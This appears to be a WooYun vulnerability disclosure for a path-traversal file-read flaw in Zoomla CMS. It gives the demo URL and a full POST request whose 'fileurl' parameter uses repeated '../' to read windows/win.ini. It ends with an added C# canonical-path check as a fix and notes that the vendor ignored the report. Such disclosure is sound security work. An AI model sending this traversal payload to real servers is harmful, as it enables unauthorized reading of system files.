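Vulnerability Details

Disclosure status:

2014-01-12: Details reported to the vendor; awaiting vendor handling
2014-01-17: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-04-09: Details disclosed to the public

Brief description:

Zoomla CMS (逐浪CMS) file inclusion

Detailed description:

URL: http://demo.zoomla.cn/Plugins/Doc.aspx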

POST:

btnBill=%e7%94%9f%e6%88%90%e5%90%88%e5%90%8c%e5%88%b0%e4%ba%91%e7%9b%98&Button1=%e6%a0%bc%e5%bc%8f%e9%a2%84%e8%a7%88&fileurl=../../../../../../../../../../windows/win.ini&Mydoc=%e6%88%91%e7%9a%84%e5%90%88%e5%90%8c&selCard=&txtDes=&__VIEWSTATE=/wEPDwUKLTMxMTEyOTYzMQ9kFgICAw9kFgJmDxYCHgtfIUl0ZW1Db3VudAIIFhBmD2QWAmYPFQIBMQzlhazlj7jlkIjlkIxkAgEPZBYCZg8VAgEyDOazleW%2bi%2baWh%2bWHvWQCAg9kFgJmDxUCATMQ6LSt6ZSA5ZCI5ZCMLmRvY2QCAw9kFgJmDxUCATQT5Yqz5Yqo5ZCI5ZCM5LmmLmRvY2QCBA9kFgJmDxUCATUZ6K%2bV55So5ZGY5bel6ICD5qC46KGoLmRvY2QCBQ9kFgJmDxUCATYZ5Zui5L2T5Z%2b56K6t55Sz6K%2b36KGoLmRvY2QCBg9kFgJmDxUCATcW57un5om/5p2D6K%2bB5piO5LmmLmRvY2QCBw9kFgJmDxUCATgc6K%2bJ6K686LSi5Lqn5L%2bd5YWo55Sz6K%2b3LmRvY2RkaEU/PNdxxazElafJNZNrFjYXg8spHysdi8MtZ8%2b7cTQ%3d






Proof of vulnerability:

[Screenshot: wenjian.jpg]

Fix:
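The `fileurl` value in the request above leaves the application directory through repeated `../` segments. The following C# sketch of a confinement check is an added example, not Zoomla code and not part of the original report; `DocPathGuard`, `docRoot` and the `.doc`/`.docx` allow-list are assumptions, because the page does not show the server-side handler.

```csharp
using System;
using System.IO;

// Added example, not Zoomla CMS code. DocPathGuard, docRoot and the extension
// allow-list are hypothetical; the page does not show the server-side handler.
public static class DocPathGuard
{
    static readonly string[] AllowedExt = { ".doc", ".docx" }; // assumption

    public static string Resolve(string docRoot, string fileurl)
    {
        if (string.IsNullOrWhiteSpace(fileurl) || fileurl.IndexOf('\0') >= 0)
            throw new ArgumentException("fileurl is empty or malformed");

        // Rooted input ("C:\x", "\\host\share\x", "/x") would make Path.Combine
        // discard docRoot entirely, so refuse it before combining.
        if (Path.IsPathRooted(fileurl))
            throw new UnauthorizedAccessException("rooted path rejected");

        string root = Path.GetFullPath(docRoot)
                          .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;

        // GetFullPath collapses every "../" segment, so the prefix check below
        // runs against the location that would actually be opened.
        string full = Path.GetFullPath(Path.Combine(root, fileurl));

        // Trailing separator on root stops "C:\docs_evil" matching "C:\docs".
        // Case-insensitive because the target is a Windows/IIS file system.
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("path escapes document root");

        string ext = Path.GetExtension(full);
        if (Array.FindIndex(AllowedExt, e => e.Equals(ext, StringComparison.OrdinalIgnoreCase)) < 0)
            throw new UnauthorizedAccessException("extension not allowed");

        return full;
    }

    public static void Main()
    {
        string root = @"C:\inetpub\docs"; // constructed sample root
        Console.WriteLine(Resolve(root, "contract.doc")); // constructed file name
        // fileurl value taken from the POST body in this report
        try { Resolve(root, "../../../../../../../../../../windows/win.ini"); }
        catch (UnauthorizedAccessException ex) { Console.WriteLine("blocked: " + ex.Message); }
    }
}
```

The check runs on the canonical path rather than on the raw string, so it does not depend on filtering `../` out of the input.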

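Copyright notice: please credit the source m1x7e1@WooYun when reposting


Vulnerability Response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2014-01-17 11:02

Vendor reply:

Latest status:

None yet


Vulnerability evaluation: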